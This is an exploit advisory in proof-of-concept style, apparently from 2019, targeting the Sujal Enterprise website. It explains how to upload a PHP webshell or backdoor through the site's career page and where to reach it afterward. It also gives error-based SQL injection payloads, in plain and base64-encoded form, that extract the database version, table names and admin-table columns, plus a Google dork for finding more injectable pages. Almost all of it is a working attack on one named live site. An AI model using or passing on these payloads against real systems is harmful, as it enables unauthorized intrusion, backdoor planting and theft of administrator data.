Sujal Enterprise FIle Upload Vulnerability

===============================================================
#  Title : Sujal Enterprise FIle Upload Vulnerability
#  Author : Dj3Bb4rAn0n (bassem)      FB/djebbar.bassem.16
#  Date : /08/04/2019
#  Home : Annaba  ( Algeria )
#  Tested on : Linux ( Backbox ) 
#  Vendor : Sujal Enterprise
#  Dork : 
===============================================================

#   PoC  : 
     -----
---------------------------------------------------------------

#  [  1  ]  File Upload Vulnerability 

#  Upload Your melcious php backdoor or webshell  from this link :      http://sujalenterprise.in/career.php

#  To display the webshell use this link  :   http://sujalenterprise.in/img/career/[  WEBSHELL NAME  ]

-----------------------------------------------------------------

#  [  2  ]  BASE64 xpath Sql injection Vulnerability  

#  Search for any injection point from google using this dork :     site:http://sujalenterprise.in .php?id 

#  Use single quoat as a payload [ ' ]

#  Version : http://sujalenterprise.in/product_details.php?id=NjQgICBhbmQgZXh0cmFjdHZhbHVlKDB4MGEsY29uY2F0KDB4MGEsKHNlbGVjdCB2ZXJzaW9uKCkpKSk=
                 : http://sujalenterprise.in/product_details.php?id=64   and extractvalue(0x0a,concat(0x0a,(select version())))

#  Tables :  http://sujalenterprise.in/product_details.php?id=NjQgICAgYW5kIGV4dHJhY3R2YWx1ZSgweDBhLGNvbmNhdCgweDBhLChzZWxlY3QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSkp
# http://sujalenterprise.in/product_details.php?id=64    and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit [  Put limit ],1)))

# Columns  :   http://sujalenterprise.in/product_details.php?id=NjQgICAgIGFuZCBleHRyYWN0dmFsdWUoMHgwYSxjb25jYXQoMHgwYSwoc2VsZWN0IGNvbHVtbl9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPURBVEFCQVNFKCkgYW5kIHRhYmxlX25hbWU9MHg3NDYyNmM1ZjYxNjQ2ZDY5NmUgbGltaXQgMSwxKSkp
# http://sujalenterprise.in/product_details.php?id=64     and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x74626c5f61646d696e limit [  PUt Limit ],1)))